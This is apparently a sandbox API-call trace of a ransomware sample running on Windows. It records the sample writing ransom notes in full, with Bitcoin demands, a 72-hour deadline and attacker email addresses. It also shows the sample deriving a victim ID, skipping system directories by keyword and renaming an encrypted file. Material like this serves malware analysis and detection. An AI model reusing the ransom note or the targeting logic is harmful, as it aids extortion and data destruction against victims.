	[0173.389] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0173.389] WriteFile (in: hFile=0x39c, lpBuffer=0x187d08*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x188c2c, lpOverlapped=0x0 | out: lpBuffer=0x187d08*, lpNumberOfBytesWritten=0x188c2c*=0xc46, lpOverlapped=0x0) returned 1
	[0173.391] CloseHandle (hObject=0x39c) returned 1
	[0173.392] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x187cd8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x187cd8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0173.392] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.393] GetUserNameA (in: lpBuffer=0x187bbc, pcbBuffer=0x187cd4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x187cd4) returned 1
	[0173.394] wsprintfW (in: param_1=0x188b58, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0173.394] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0173.394] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0173.394] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0173.394] WriteFile (in: hFile=0x39c, lpBuffer=0x188b58*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x188c34, lpOverlapped=0x0 | out: lpBuffer=0x188b58*, lpNumberOfBytesWritten=0x188c34*=0x30, lpOverlapped=0x0) returned 1
	[0173.395] CloseHandle (hObject=0x39c) returned 1
	[0173.395] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0173.395] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0173.396] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0173.396] wsprintfW (in: param_1=0x188910, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML") returned 122
	[0173.396] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0173.401] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0173.401] WriteFile (in: hFile=0x39c, lpBuffer=0x188104*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x188c28, lpOverlapped=0x0 | out: lpBuffer=0x188104*, lpNumberOfBytesWritten=0x188c28*=0x808, lpOverlapped=0x0) returned 1
	[0173.406] CloseHandle (hObject=0x39c) returned 1
	[0173.406] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.407] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1880ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1880ec*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0173.407] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.407] GetUserNameA (in: lpBuffer=0x187fd0, pcbBuffer=0x1880e8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1880e8) returned 1
	[0173.409] wsprintfA (in: param_1=0x188b18, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0173.409] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0173.410] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0173.410] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0173.410] WriteFile (in: hFile=0x39c, lpBuffer=0x188b18*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x188c30, lpOverlapped=0x0 | out: lpBuffer=0x188b18*, lpNumberOfBytesWritten=0x188c30*=0x43, lpOverlapped=0x0) returned 1
	[0173.410] CloseHandle (hObject=0x39c) returned 1
	[0173.411] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x80e1b2f6, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640034, dwReserved1=0x7d0066, cFileName=".", cAlternateFileName="")) returned 0xfb8f30
	[0173.411] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\*.*") returned 97
	[0173.411] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.411] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\*.*", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*") returned 0x61
	[0173.411] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.412] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="windows") returned 0x0
	[0173.412] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.412] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="boot") returned 0x0
	[0173.412] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.412] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="system volume information") returned 0x0
	[0173.412] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.412] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0173.412] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.413] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="temp") returned 0x0
	[0173.413] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.413] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="program files") returned 0x0
	[0173.413] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.413] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="program files (x86)") returned 0x0
	[0173.413] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.413] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="appdata") returned 0x0
	[0173.414] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.414] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="application data") returned 0x0
	[0173.414] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.414] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="winnt") returned 0x0
	[0173.414] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.414] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="tmp") returned 0x0
	[0173.414] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.414] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="cache") returned 0x0
	[0173.415] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.415] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="temporary internet files") returned 0x0
	[0173.415] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.415] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="webcache") returned 0x0
	[0173.415] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.415] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="inetcache") returned 0x0
	[0173.415] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.416] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="nvidia") returned 0x0
	[0173.416] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.416] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="packages") returned 0x0
	[0173.416] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.416] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="cookies") returned 0x0
	[0173.416] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.416] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\*.*", lpSrch="programdata") returned 0x0
	[0173.416] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0173.417] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0173.417] FindNextFileW (in: hFindFile=0xfb8f30, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x80e1b2f6, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640034, dwReserved1=0x7d0066, cFileName="..", cAlternateFileName="")) returned 1
	[0173.417] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0173.417] FindNextFileW (in: hFindFile=0xfb8f30, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80e1b2f6, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x80e1b2f6, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x80e416f9, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x640034, dwReserved1=0x7d0066, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0173.417] FindNextFileW (in: hFindFile=0xfb8f30, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80e1b2f6, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x80e1b2f6, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x80e1b2f6, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x640034, dwReserved1=0x7d0066, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0173.417] FindNextFileW (in: hFindFile=0xfb8f30, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa16203b1, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa16203b1, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1646620, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x21b, dwReserved0=0x640034, dwReserved1=0x7d0066, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1
	[0173.417] FindNextFileW (in: hFindFile=0xfb8f30, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa16203b1, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa16203b1, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1646620, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x21b, dwReserved0=0x640034, dwReserved1=0x7d0066, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 0
	[0173.417] FindClose (in: hFindFile=0xfb8f30 | out: hFindFile=0xfb8f30) returned 1
	[0173.417] FindClose (in: hFindFile=0xfb8f30 | out: hFindFile=0xfb8f30) returned 0
	[0173.418] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d5c758, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x80d5c758, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x80d5c758, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xd0, dwReserved0=0x640034, dwReserved1=0x7d0066, cFileName="runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="RUNTIM~1.SCL")) returned 1
	[0173.418] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d5c758, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x80d5c758, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x80d5c758, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xd0, dwReserved0=0x640034, dwReserved1=0x7d0066, cFileName="runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="RUNTIM~1.SCL")) returned 0
	[0173.418] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0173.418] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0173.419] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 0
	[0173.424] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0173.425] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0173.425] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdc44d0, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{99b095d8-5959-4820-bea7-7448c8427b4e}", cAlternateFileName="{99B09~1")) returned 1
	[0173.425] lstrcmpW (lpString1="{99b095d8-5959-4820-bea7-7448c8427b4e}", lpString2="..") returned 1
	[0173.425] lstrcmpW (lpString1="{99b095d8-5959-4820-bea7-7448c8427b4e}", lpString2=".") returned 1
	[0173.425] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning") returned="C:\\Users\\All Users\\Microsoft\\Provisioning"
	[0173.426] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\"
	[0173.426] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\", lpString2="{99b095d8-5959-4820-bea7-7448c8427b4e}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}"
	[0173.426] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}"
	[0173.426] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\"
	[0173.426] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\"
	[0173.426] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*"
	[0173.426] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0173.431] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*") returned 84
	[0173.431] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.432] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", cchLength=0x54 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*") returned 0x54
	[0173.432] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.432] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="windows") returned 0x0
	[0173.432] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.432] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="boot") returned 0x0
	[0173.432] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.432] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="system volume information") returned 0x0
	[0173.433] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.433] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0173.433] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.433] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="temp") returned 0x0
	[0173.433] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.433] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="program files") returned 0x0
	[0173.433] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.434] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0173.434] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.434] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="appdata") returned 0x0
	[0173.434] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.434] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpSrch="application data") returned 0x0
